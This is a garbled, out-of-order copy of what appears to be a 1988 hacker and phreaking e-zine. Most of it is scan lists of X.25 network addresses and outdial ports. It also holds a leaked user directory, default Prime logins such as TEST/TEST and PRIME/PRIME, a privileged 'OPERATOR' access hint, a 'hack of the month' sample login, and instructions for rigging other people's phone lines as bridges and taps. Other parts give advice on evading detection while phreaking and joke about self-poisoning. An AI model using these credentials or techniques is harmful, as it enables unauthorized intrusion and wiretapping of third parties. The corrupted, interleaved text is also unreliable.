"User Name/Nom D'Usager?" 302089400101 - "User Name/Nom D'Usager?" 302089400900 Outdial Port - 300 Baud 30208940<2<΋0901 Outdial Port - 1200 Baud D A T A P A C 302090300xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 23/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302090300029 - "CHANNELS BUSY" 302090300049 - 302090300051 <30o\ - fax 302090300052 - fax 302090300053 - fax 302090300065 - fax 302090300069 - 302090300078 Port Select - "Enter System ID: " 302090300095 - 302090300104 - "Password: " D A T A P A C 302090500xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ F( #_ <0(jN%At <0(jN%ABpBlBt<%BXv>%C\x$%D`z.%Ed%i,*~h%i\x%i,|%it" <0(j " 302083500104 Prime <%E){q - 302083500133 HP-3000 - 302083500166 - "v21>" 302083500169 - 302083500172 HP-3000 - 302083500181 - "v21>" 302083500185 - "v21>" 302083500605 - 302083500609 - 302083500628 - 302083500637 - 302083500668 - 302083500681 - 302083500688 <&Fs% Unix - 302083500698 Port Select - "SERVICE ID=" 302083500704 - "C@" 302083500705 - 302083500714 - "CHANNELS BUSY" 302083500723 - "CHANNELS BUSY" 302083500730 VAX/VMS - Agriculture Canada VAX 302083500735 VAX/VMS - 302083500739 - Thunderbird & CID Systems 302083500744 - 302083500745 <'G - 302083500901 - "Username/NOM D'USAGER?" D A T A P A C 302085700xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 26/12/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302085700013 - 302085700014 - 302085700016 <(H4O - 302085700024 - 302085700049 VAX/VMS - BONDAR-CLEGG and Company LTD. OTTAWA 302085700050 - 302085700051 - 302085700058 - 302085700064 - 302085700116 HP-3000 - 302085700210 VAX/VMS - 302085700316 - 302085700388 - 302085700393 - TACL 302085700436 <)3us - Outdial Port 302085700437 - Outdial Port 302085700438 - Outdial Port 302085700439 - Outdial Port 302085700440 - Outdial Port 302085700441 - Outdial Port 302085700442 - Outdial Port 302085700444 - Outdial Port 302085700445 - Outdial Port 302085700446 <J - 302076500061 - "v127" 302076500080 Port Select - "SERVICE ID=" 302076500083 - 302076500087 - 302076500090 - 302076500112 - Dartmouth 302076500118 - "Chanells Busy" 302076500146 - 302076500149 VAX-8200 - Applied Microelectronics System 302076500155 DG AOS/VS - CANFOR Atlantic Re<K_gion 302076500156 DG AOS/VS - CANFOR Dartmouth 302076500185 - 302076500197 - 302076500224 - "Channels Busy" 302076500258 - 302076500259 - 302076500266 - 302076500316 VAX/VMS - 302076500378 - 302076500379 - D A T A P A C 302078100xxx Sprint, By: ---===} THE FORCE {===-<LK-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 15/05/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302078100020 - 302078100055 - 302078100187 - "SS>" 302078100260 - 302078100284 fax - 302078100331 - 302078100340 <MG - 302078100380 Port Select - "SERVICE ID=" 302078100394 fax - 302078100466 Outdial - OUTDIAL PORT 302078100467 Outdial - OUTDIAL PORT 302078100468 Outdial - OUTDIAL PORT 302078100469 Outdial - OUTDIAL PORT 302078100548 - 302078100572 DG AOS/VS - DG AOS/VS CANFOR ST. JOHN'S 302078100594 VAX/VMS V4.5 8200 - 302078100600 Outdial <N>< - OUTDIAL PORT 302078100601 Outdial - OUTDIAL PORT 302078100602 Outdial - OUTDIAL PORT 302078100603 Outdial - OUTDIAL PORT 302078100604 Outdial - OUTDIAL PORT 302078100605 Outdial - OUTDIAL PORT 302078100606 Outdial - OUTDIAL PORT 302078100607 Outdial - OUTDIAL PORT 302078100651 VAX/VMS V4.6 8800 - Node Leif Computing Services 302078100665 <O>NBv - 302078100677 - 302078100683 - 302078100900 Outdial - OUTDIAL PORT 302078100901 Outdial - OUTDIAL PORT D A T A P A C 302079400xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 12/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=<Pk #-=-= 302079400002 - 302079400003 - 302079400004 - 302079400100 - "Username/Nom D'usager: " 302079400101 - "Username/Nom D'usager: " 302079400210 - 302079400211 IBM VM/CMS, CICS - 302079400215 - 302079400268 - "Username/Nom D'usager: " 302079400269 - "Username/Nom D'usager: " 3<Q[02079400900 - "Username/Nom D'usager: " 302079400901 - "Username/Nom D'usager: " D A T A P A C 302082700xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REALM - 28/12/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302082700107 HP-3000 - 302082700294 <R=b IBM VM/370 - VMI 302082700297 - "enter appropriate code for access" 302082700336 fax - 302082700362 - 302082700363 - 302082700364 - 302082700365 - 302082700366 - 302082700370 - A.F.M.Q. Q.F.M.A. 302082700375 - "enter appropriate code for access" 302082700376 <S(j - "enter appropriate code for access" 302082700377 - "enter appropriate code for access" 302082700378 - "enter appropriate code for access" 302082700379 - "enter appropriate code for access" 302082700380 - "enter appropriate code for access" 302082700414 - 302082700429 - 302082700446 Outdial Port - 302082700447 Outdial Port <>9[C - 302082700448 Outdial Port - 302082700449 Outdial Port - 302082700512 - "enter appropriate code for access" 302082700522 - "enter appropriate code for access" 302082700524 - "enetr appropriate code for access" 302082700525 - "enter appropriate code for access" 302082700526 - "enter appropriate code for access" 302082700537 < Uhs281 - 302042300286 - SWIFT Adhesive / Brampton 302042300295 Unix - Custom Services System CSCAN 302042300296 - Northern Telecom 302042300307 - 302042300903 - Northern Telecom D A T A P A C 302062700xxx Nua's, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the depths of - THE REAL< VKM - 22/05/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This area has not been sprinted yet. 302062700099 fax - D A T A P A C 302074600xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 23/05/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< W3>ә=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302074600004 Outdial - 302074600005 OUtdial - 302074600023 302074600038 302074600044 302074600045 302074600047 302074600054 302074600058 302074600078 302074600082 302074600094 302074600095 302074600099 302074600125 - "SJ" 302074600128 302074600154 - "hi bill bob rick" (CTRL-E) 302074600198 302074600212 302074600237 302074600238 302074600239 302074600257 302074600258 3020746002< XP60 302074600261 302074600268 Port Select - "enter class" 302074600274 302074600289 Port Select - "SERVICE ID=" 302074600311 302074600312 302074600323 - (Data Encryption in use) 302074600352 302074600391 302074600395 302074600439 302074600573 302074600575 302074600900 302074600901 D A T A P A C 302076100xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~< Y5~~~~~~~~~~~~~ From The depths of - THE REALM - Last Updated: 31/12/1987 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302076100002 - 302076100023 Port Select - "Request: " 302076100025 - 302076100036 VAX/VMS - Dalhouse Uni Computing and Info Service 302076100039 - 302076100045 - "CHANELLS BUSY" 302076100046 <Z\a+ - 302076100053 - 302076100056 - 302076100058 - 302076100060 Test Nua - TEST PATTERN 302076100066 - 302076100067 - 302076100102 - 302076100159 Primos 20.2.3 - PRIMENET 20.2.3 MD.HAL 302076100189 - 302076100234 - "Password> " 302076100249 - 3020761<[W00334 - 302076100338 Port Select - "Request: " 302076100351 - 302076100392 - "HL" 302076100396 - 302076100397 - 302076100429 - 302076100450 RSX-11M-PLUS - 302076100451 VAX/VMS - 302076100459 - "User Number: " 302076100572 - 302076100618 - 302076100630<\|Ϡi - 302076100692 Port Select - "SERVICE ID= " 302076100697 - 302076100702 - 302076100754 - 302076100772 - 302076100773 - 302076100776 - 302076100777 - 302076100778 - 302076100779 - 302076100780 - 302076100782 - 30<]rn2076100783 - 302076100784 - 302076100817 - 302076100826 Port Select - "SERVICE ID= " 302076100832 - 302076100849 - 302076100850 Port Select - Computing Services 302076100866 - 302076100869 - 302076100871 - 302076100876 - 302076100877 - 30207610<^K0898 Outdial Port - 300 Baud 302076100899 Outdial Port - 1200 Baud 302076100911 - 302076100957 - 302076100961 - "CHANELLS BUSY" 302076100962 Port Select - "SERVICE ID= " 302076100966 Port Select - "SERVICE ID= " 302076100970 - 302076100973 Teleprinter - WHISPER WRITER 1000b Teleprinter 302076100991 DG AOS/VS - ITT/RAE Halif<I5ax D A T A P A C 302076500xxx Sprint, By: ---===} THE FORCE {===--- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From The depths of - THE REALM - Date: 09/02/1988 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 302076500023 - 302076500027 VAX/VMS V4.2 - Micro Vms 302076500029 - 302076500047 302076500048 : `JUST THE SO-CALLED "BIG-TIME" ONES. EVEN PEOPLE WHO MAKE LESS THEN $10 WORTH OF ILLEGAL CALLS HAVE A GOOD CHANCE OF GETTING BUSTED. THIS STILL LEAVES THE QUESTION ABOUT WHAT IS SAFE TO USE FROM A PAY-PHONE. DO NOT USE 1729 FROM A PAY-PHONE. THEY WILL INVESTIGATE THE PERSON YOU CALLED, AND CAN PUT A TAP ON YOUR LINE IF THEY FIND OUT ABOUT THE PAY-PHONE PHREAKING. AS FAR AS 0266, THEY ARE MORE INTERESTED IN HITTING THE COMPUTER PHREAKERS, SO IT IS STILL RELATIVELY SAFE TO USE 02: a?66 FROM A PAY PHONE, BUT DON'T PRESS YOUR LUCK. KEEP YOUR PHREAKED-PAY-PHONE CALLS TO A MINIMUM AND YOU WILL PROBABLY BE SAFE. YOUR QUESTION NOW IS PROBABLY, "BUT WHAT CAN I DO NOW?? WHAT ABOUT ALL THOSE RAD WARES ON THAT BOARD IN GEORGIA I'M ON??" WELL, YES, THERE IS STILL ONE WAY TO PHREAK THAT IS SAFE. PC PURSUIT. ALTHOUGH SEVERAL RUMORS HAVE GONE AROUND ABOUT PC PURSUIT BEING DANGEROUS, WE HAVE CONTACTS AND KNOW FOR A FACT THAT IT IS NOT. IF YOU HAVE PCP CODES, DON'T GI: b mVE THEM OUT LIKE THEY ARE SIMPLE TO GET. THE MORE PEOPLE THAT HAVE THEM, THE FASTER THEY DIE, AND YOU WILL FIND THAT THEY ARE HARD TO GET BECAUSE THERE IS NO WAY TO GET YOUR COMPUTER TO HACK THEM. THE ONLY WAY TO GET A PCP CODE IS RANTEED TO BE BUSTED, ESPECIALLY AT THIS POINT IN TIME. THIS FILE HAS BEEN TRUE. IT IS NOT BULLSHIT. AND IT MAY JUST SAVE YOU FROM RUINING YOUR LIFE. -PIRATES AND DISTRIBUTORS SPECIAL CONTRIBUTIONS TO THIS FI:  VLE MADE BY: THE ICE MAN SUPER PHREAY (0266) OR SOMETHING. WHAT IS YOUR THEORY? BY AN EMPLOYEE OF COM SYSTEMS O O NOW?? WHAT ABOUT ALL THOSE RAD WARES ON THAT BOARD IN GEORGIA I'M ON??" WELL, YES, THERE IS STILL ONE WAY TO PHREAK THAT IS SAFE. PC PURSUIT. ALTHOUGH SEVERAL RUMORS HAVE GONE AROUND ABOUT PC PURSUIT BEING DANGEROUS, WE HAVE CONTACTS AND KNOW FOR A FACT THAT IT IS NOT. IF YOU HAVE PCP CODES, DON'T GI<dj< D for the account, the login directory, or it changes the file from which all the Record Data is being taken for each account. Without a manual, I can't tell you what it is I actually did, but I recomend you keep away from that command, if like me, you don't know what you're doing. Well, at least they had the good sense to make the more up to date versions of primos far more user friendly. There are online help8)0  # # # # HPDesk system is UNAVAILable during about # # 7:30 to 8:30 a.m. every Monday, due to MAIL # # MAINTENANCE. # # # ################# Thank you for your cooperation. #### : ------------------------------------------------------------------------------- INSIDE INFORMATION ~~~~~~~~~~~~~~~~~~ 8*LDThe Times Network has the priviledge of having number 1 in the dialcom network. This doesn't mean it was the first, and it's more or less your average dialcom set up running on a number of primes. I don't know whether the users of this system have Netlink access, since we have never spent enough time on it to find out. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-= TIMES NETWORK System 01 User Directory =-=-= =-=-=8+z =-=-= =-=-= By: ----====} THE FORCE {====---- Date: 12/03/88 =-=-= =-=-= =-=-= =-=-= - From The Depths Of - The Realm - =-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 4132 EXPLORERS TRAVEL MCGEE, B 01:MAG10054 6936 MAPLES, WAR8,#ING WHITE, I V 01:PCW10004 6937 MICRO RESOURDCE GOLD, STEVE 01:PCW10019 6938 HELSTON COMPUTER CENTRE HARMER, CAREY 01:PCW10024 6939 ENTERPRISE SOFTWARE PRODUCTS ILLINS, DAVE 01:PCW10077 6940 LATHAM LATHAM, R F (DR) 01:PCW10084 6941 CAPRICORN DATA LTD DEANE, JAMES 01:PCW10087 6943 TOUCHE ROSS & CO STILLING, PETER 8-: 01:PCW10095 6944 STILLING PETER. J. STILLING, PETER. J. (MR) 01:PCW10095 6945 STILLING P.J. STILLING, PETER J. 01:PCW10095 6947 IMPRESSE LIMITED COLLISON, B A 01:PCW10107 6948 SOFTWARE DYNAMICS LTD PINNICK, P R (DR) 01:PCW10110 6949 FIVESTAR SOFTWARE HARRIS, JUNIOR (MR) 01:PCW10118 6950 PRESTEL STOUTE II, EDWIN (DR) 01:PCW10118 6951 FIVESTAR 8.&p HARRIS, E (MR) 01:PCW10118 6952 FIVESTAR SFTWAR HARRIS, E (MR) 01:PCW10118 11602 PERSONAL COMPUTER WORLD LINDERHOLM, OWEN 01:XYZ001:PCW002 11623 GWYNEDD CAREERS SERVICE WILIAMS, RHYS E 01:YNK011 11707 LACKHAM COLLEGE OF AGRICULTUR SAVAGE, RICHARD (MR) 01:YSS011 ------------------------------------------------------------------------------- DNIC UPDATES ~~~~~~~~~~~~ The number of networks is8/s@ growing every day, and any new network is mostly virgin territory, full of bugs, and security faults. I will have a revised listing of all the dnics in few months time, but at the moment, here are few new networks and updates which I came up with this month. Country Network Dnic ================================================== BARBADOS IDAS 3420 BELGIUM DCS 2064 BERMUDA 80 IDAS 3500 BERMUDA IDAS 3504 CHILE VTR 7305 DOMINICAN REPUBLIC CODETEL 3701 LUXEMBOURG LUXPAC 2703 PANAMA INTELPAQ 7142 PERU ??? 7160 SINGAPORE ??? 5251 SINGAPORE ??? 5252 USA US LINK NETWORK 70481C~5 Some recent updates, to the List in VOLUME #1 ARGENTINA 7220 - Network Called UDTS, not ARPAC CHILE 7303 - Network Called CHILE-PAC Not ECOM EGYPT 6023 - Network Name ARENTO, recently found the DNIC ------------------------------------------------------------------------------- CONTRIBUTIONS ~~~~~~~~~~~~~ Globe Trotter has been running for almost half a year now, and it now enjoys international audiences, so how about putting something back into it. I am really f82+\inding it hard to come up with the usual two files, and i can no longer release one issue every month, although I'll keep trying. If you have anything please mail me. We require Information, Files, Sample Logins of Hacked Systems, Nua's, ANYTHING. Ahhh, this reminds me. As you may have noticed, I am obssesd with mapping out the networks on this earth, and I really get exited every time I make a new entry into the Realm Dbase, which now occupies arround 1 meg. If anyone has any Prim83uues (with Netlink) they would like to contribute to the cause, I'll supply you with all the results gained, and I will give the use of the dbase which we all ready have, for searches and for info on particular areas. (Not the complete Dump by the way!). Secondly, if anyone would like to co-ordinate scanning from a particular system, or the areas being scanned, Please, again contact me, since a lot of resources would be saved. Lastly, if you have your own compiled lists of NUA's or8S ~~~~~~~~~~~~~~~~ Yes He did it again. I am fully stocked up with primes, so I guess you will get some of the useless ones to try for yourselves. Ok, lets get to it, I have a prime in Israel, Asia and something little better. 5252116048 PRIMENET 20.2.2 PS PORE Login TEST/TEST 425140000216 PRIMENET 20.2.1.R2 MOKED Login PRIME/PRIME 3110312001xx Type 'OPERATOR' Well, I think after all this time, you might deserve something of greater value.8lF To make sure Only few get it, there are 99 combinations you will need to try untill you find the right system. When you do, typing operator, will give you Nice access with a fair bit of privs, like changing the news and login messages etc etc. Have fun, and may you find it. If you do, I hope you are not that stupid as to actually change the system new8 4ȢSs and loggin messages!!! ------------------------------------------------------------------------------- TRIX OF THE TRADE - LOOPS ~~~~~~~~~~~~~~~~~~~~~~~~~~~ It is very hard to find a loop in Australia, and I guess you can all imagine how many uses they have. There are rumours that they do exist down here, but as I yet I have never seen a REAL ONE. Luckilly, there are ways around everything. There are certain numbers, which you can call, mainly some old PBX's and my favourite a8!x% n out of order telecom recorded message service. Next thing you will need is to boost the signal which your phone sends out, so that the current leaks across the relays and other circuits. Basically if you can find the right number, and there are a few around, you can create your own artificial bridge. Then if people call the same number, there is enough signal leaking from one line to another to get an audible connection. If you are lucky, you will not need any extra hardware to 8"Zkboost the signals from your phone. This is usually the case if you can come across a telecom recorded message service which is out of order. They work exceptionally well. The second method of building your own bridges, involves few alterations to a telecom junction box. It is a relativelly simple circuit and all you have to do is pick two or more people and install it on their lines. The circuit has to keep the line open, after the real user hangs up the phone. Second thing, via 8# Lfew resistors you connect two lines with an identical circuit on each. Thus one person calls one number, other the second, say it was a wrong number when the real owners answer and after they hang up, the two lines get connected. This is the most simplest circuit, all it does is keep the line open, Connect the two lines after the real owner has droped his receiver and disconnect you as well as the link when he picks up the phone. Basically when the owner drops the line it activates a8$͜ switch which keeps it open and links with another, and when he picks up the phone it turns itself off, cutting the link and disconnecting you. This also makes an ideal phone tap, since you can listen in from any phone anywhere in the world. If you happen to be a serious electronics buff, then something a little more elaborate is possible. A circuit that hooks up 3 line and is controlled from one line. If you send a particular tone or sequence of pulses, you can activate/deactiva8%gte the connections to the other lines and even use them as extenders. Basically the sky is the limit and all of the circuit are cheap to construct, and can be made reasonably compact. ------------------------------------------------------------------------------ UNUSUAL SYSTEMS ~~~~~~~~~~~~~~~ This is a very interesting System, I have found in HONG KONG. (yes, the complete scans are comming soon). It is most probably an outdial, or some some sort of a datafax conversion service 8&which it claims to be. I have no idea what a datafax conversion service does, but it does prompt you to enter a number, and the accepted format is identical to the local phone numbers. 4545500431 - Datafax Conversion Service ------------------------------------------------------------------------------- HACK OF THE MONTH ~~~~~~~~~~~~~~~~~ Hack Of The Month: HP-3000 Location: JAPAN Date: 04/AUG/88 Hacked By: ----====8'} THE FORCE {====---- Notes: Nothing interesting about this system. Only worth while thing, is the stock and shares information it contains. Theoretically it would be possible to assign yourself shares in that company. Sample Login: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ?-04408xxxxx COM : hello xxxxx.xxxxxxxx HP3000 / MPE V G.xx.xx (BASE G.xx.xx). SUN, AUG 14,8(> 1988, 10:35 AM ######## This is Tokyo, Japan ######################## # # # System Back-up time is as follows: # # # # MON 7:00 ~ 7:30 a.m. # # TUE - THU 7:45 ~ 8:15 a.m. # # FRI 7:45 ~ 9:15 a.m. # # # # To: HPDesk users 8BW and antenae are also needed. A long-distance microwave line is made up of a series of relay towers spaced approximately 30 miles apart, with every two consecutive towers within sight of each other. Signals are amplified and retransmitted by the towers along the route. SATTELITES These are, in fact forms of microwave transmission in that the satellites which orbit around the earth in8tU geo-synchronous orbits, represent relay stations for earth bound communications links. This type of microwave transmission is ideal for long-distance communications since the high altitude of the satellite avoids the interference caused by earth's curvature and other physical obstructions such as mountains and atmospheric conditions. A large number of 8Rcommunication satellites are now orbiting the earth, and are utilized for domestic as well as international communications. UNDERSEA CABLE These are special types of coaxial cables laid on the seabed across the ocean. They provided an important means for intercontinental telephone communications before the introduction of the satellites, and are still used heavily. WAVEGUIDES Thes8e are metal tubes that serve as paths and confinement for very high frequency radio waves. There are two types of waveguides: rectangular and circular. The rectangular waveguide has been used for some time as a feder line between microwave antennae and their associated ground equipment. It is useful only for very short distances, usualy not more than 1000 feet. The circular 8ljwaveguide can provide much longer transmission lengths and is being implemented on Experimental Basis. Waveguides can prowide vast transmiossion capacity for voice as well as data. They hae beep,proven feasible, but their large scale implementation will most probably never take off. FIBRE OPTICS Fibre optic Cables a really a form of a waveguide, in this case light wave8` us are used. The high frequency means a very large number of logical channels can be transmitted over a single fibre. Fibre optic cables are now replacing the wire pairs, and allready are being used for links between subscribers and the local offices, where as few years ago, they were restricted to land lines and inter-exchange lines. This transmission medium, is likelly 8to dominate the world of telecomunications, within the next few years, because it is cheap and free from distortions and electromagnetic interference, which the wire pairs and other cables suffer. A single Fibre Optic Cable is very thin, thus hundereds of strands can be bound together into a small sized cable, and at 2 cents per meter, per strand, it is becomming very 8IkL economical. LASERS Laser stands for Light Amplification by Stimulated Emission Radiation. Just like the fibre optic transmission, a laser utilizes a much higher portion of the electromagnetic spectrum. It can thus be used for transmission without tying up all ready crowded radio frequency spectrum. The laser is limited to communications along a line of sight, which8]e suggests a possibility for short links betwwen large buildings for example. The laser is still being developed, and posible hopes are for communications with satellites and over interstellar distances. I have set a limit to the maximum size of each file, and I seem to be going over the limit, so I'll continue this next month. I'll have some actual HOW TO, information on phreaking, as well as information on.8m̖ - FREQUENCY, BANDWIDTH and TRANSMISSION SPEEDS - DIGITAL AND ANALOG TRANSMISSION - MULTIPLEXING - LINE FACILITIES - SWITCHED FACILITIES - LOW-SPEED LINES - VOICEGRADE LINES - WIDEBAND LINES - PRIVATE LEASED LINES - DIGITAL TRANSMISSION FACILITIES - PACKET SWITCHING SERVICES 8Hn - COMMON CARRIERS - TRANS-CANADA TELEPHONE SYSTEM - CNCP TELECOMMUNICATIONS - SPECIALIZED COMMON CARRIERS - MCI TELECOMMUNICATIONS CORP. - SP COMMUNICATIONS COMPANY Rather are large list of material, and the ideas keep comming in, hehehe something to do over the next few months. ------------------------------------------------------------------------------- SYSTEM PASSWORD8|:h. I have a small listing with some of the more recent discoveries. - CONTRIBUTIONS I really need some help!. - PRIME ACCOUNTS Some Tips for Creating Accounts On Primes. - THUNDER DOWN UNDER Time is Near! =============================================================================== PHREAKING ~~~~~~~~~ I don't really want to write this section, so I will try to organise someone else to 8 2do it for me. One of the reasons being that I have enough to do with the rest of the file, and I know there are people out there far more qualified in the art of Phreaking. Phreaking is technically, ripping off the phone companies, which I think is ok, since they rip us of rather badly themselves. Phreakers however define phreaking, as using the resources available for the sake of knowledge. There is no doubt everyone has their own definition. To get started, I'll talk about8 d the technology, what systems are being used and how they work, as well as other related topics. This is only an introduction, based on the technical side and on how the system works. The Information on HOW TO, will follow over the next few issues. CLASSES OF TRANSMISSION MEDIA ============================= OPEN WIRE This is the most original of all transmission media. It consists of a pair of copper wires strung between telephone poles8 Z, carrying one voicegrade channel that is used alternately by a number of subscribers on the network. One pair of wires can serve only two points at a time. Since the early days of telephone, wire pairs have largely been replaced by other transmission media for voice communications, but are still used in certain countries and even certain rural areas of AUSTRALIA, USA, CA8 TNADA etc. For data transmission over long distances, wire pairs are not desirable since they are suceptible to such problems as cross talk, electromagnetic interference, loss of attenuation, etc., resulting in poor line quality. CABLE The cost of installing open-wire pairs and the rapidly increasing requirement for transmission channels soon led to the bundling8 37 of insulated wires into a large cable, with each pair uniquely coloured for identification. As many as several hundered pairs of wires can be bundled in one cable. This method not only reduces cost of installing telephone facilities, but also protects the wires from the elements. Most telephone lines between central offices and local subscribers are cables. Significantly,8H each pair of wires is now capable of carrying a number of voice channels. COAXIAL CABLE A coaxial cable is composed of a conductive cylinder with a wire in the center, with the space between the conductive cylinder and the wire filled with insulating medium. A coaxial cable can transmit at a much higher frequency than a wire pair, allowing greater amounts of data to be transmitted 8ݑ in a given time period, that is, the channel is "wider". A great number of voice channels can be sent over coaxial cables, which are shielded from noise and other forms of distortion. CARRIER SYSTEM A carrier system is not a physical entity, rather, it is a technique of utilizing various transmission media. Through the use of multiplexing techniques, a carrier system can 8 n accomodate a number of channels on the same physical line, be it an open wire pair, cable, or a coaxial cable, by placing each channel on a different frequency level. HIGH FREQ. RADIO Instead of sending electrical signals over metallic media as in the cases of open wire, cable and coaxial cable, a long-wave radio system transmits radio signals over ope air space at a speci8Jfic portion of the frequency spectrum. High frequency means that a much larger number of signals can be transmitted, compared with other media. MICROWAWE MIcrowave transmission utilizes the high end of the radio frequency range and requires special equipment for transmission and reception. It is currently being used by common carriers and specialized common carriers alike, 8f primarily on long-haul communications links. Its advantage over radio, and cable systems is that it requires less frequent reamplification, and that no wire stringing is needed. Also, the possible bandwidth capacity is much greater with microwave radio transmission. By the same token, microwave transmission requires a line of sight path; a high transmission tower6%M*o o ----------------- M ! ! ! ! O ! -------)-------------------- ! D ! loop ! 1! !5 E ! relay ! ! ! M ! ! ! ! ------------ ! ! ! ! --------------- ! ! ! ! ----------- ! ! ! ! 6&!Ϭ ! ! ----!----!----- phone ! 2! !6 ! 610 plug ! ! ! ! socket ----!----!----- ! ! \!/ \!/ to phone Basically, what the above diagram describes is as follows : The incoming line goes to pins 2 and 6 on a Telecom 611 socket. This must be the first socket in the circuit. Then run a pair from pins 1 and 5 of 6';the same socket to pins 2 and 6 on a Telecom 610 socket. Any further telephone extensions can be paralleled to pins 2 and 6 and as many sockets as is required. It should be noted that when the modem is switched to data, ALL telephones in the circuit will be disabled. AUSTPAC UPDATE -------------------------------- AUSTPAC : If you have any difficulty with Austpac connection to us, please advise via Electronic Mail to TAB or via the hotline. All relevant informa6(etion will be passed on to Telecom and Data General. WHO TO CALL If you are disconnected from the system when connecting via Austpac please call 1107 (free call), (N.S.W. users - (02) 211.0711) ask for Austpac Division and report the problem. DELETE AND CLR DTE Austpac users please use your BACKSPACE key ONLY (ASCII 8) to delete characters until further notice. Do NOT use DELETE (ASCII 127). Also type SET?15:1 after you have typed PROF 7. Alternatively, after you ha6)cve logged on, type CTRL-P SET?15:1. This will cut down the incidence of the CLR DTE 000 message! NOTE - The TAB Austpac ID number is now ?238220000. It should be noted that when the modem is switched to data, ALL telephones in the circuit will be disabled. AUSTPAC UPDATE -------------------------------- AUSTPAC : If you have any difficulty with Austpac connection to us, please advise via Electronic Mail to TAB or via the hotline. All relevant informa8yѕS::::::::::::::::::::::::::::::::::::::::::::::::||=+=+=+ (C) - Copyright 88 The Realm CONTRIBUTORS: NONE Yet Again Grrrrr! FROM THE EDITOR ~~~~~~~~~~~~~~~ Never.........In The Field......... Of Human Conflict, Have so Few........Stuffed so much...For So many. We shall fight them on our Baud Lines, on The Networks, with our Pc's We Shall Never Surrender!!!!! D E A T H T O T E L E S C U M Anyone hacking i8jn Melbourne and Victoria in general, should understand the above. Lets face it, they have gone too far. As soon as the new laws were passed, they unleashed their terror, purpouse of which was to scare us, and I am afraid It worked. As soon as the word got out that boards were being raided, by the feds and friends, over 50% of existing hacking establishments have been whiped from the face of this earth, and virtually all the rest have been so severelly straightened out, and tha8Xt's not funny. Apart from The Realm, there are two hacking boards still operating as before, with just one being of decent quality. Congratulations to the sysop. You know who you are. Lets just hope things will get back to normal soon. I would just like to say few words to telescum and DI if they're watching. "You haven't killed the hackers, they will always haunt you. All you achieved, is to remove the only means by which you can find out what we are up to" I must admit the8WWy got to me as well, but sometimes, you got to say what the fuck, and go for it. As a result here it is, Globe Trotter Volume #5 and plans are on the way for future issues, which I hope will get even bigger and better. Look on the bright side, if you ever stuff things up, ten years in jail will go very quickly and there is nothing few cc's of Ethylene Glycol can't fix. Catch Ya Later ----====} THE FORCE {====---- ----------------------------------------------------------8$--------------------- I N D E X ~~~~~~~~~~~~~ R E G U L A R F E A T U R E S -------------------------------- - Phreaking This will be a section which will run over the next few issues. It will mainly deal with the more technical espects of phreaking. - System Passwords: Primes and other bits. - Trix of The Trade AUSSIE LOOPS 81 - Unusual Systems An outdial in Hong Kong? - Hack Of The Month HP-3000 In Japan - Inside Information Dialcom System 01, The Times Network User List - Network 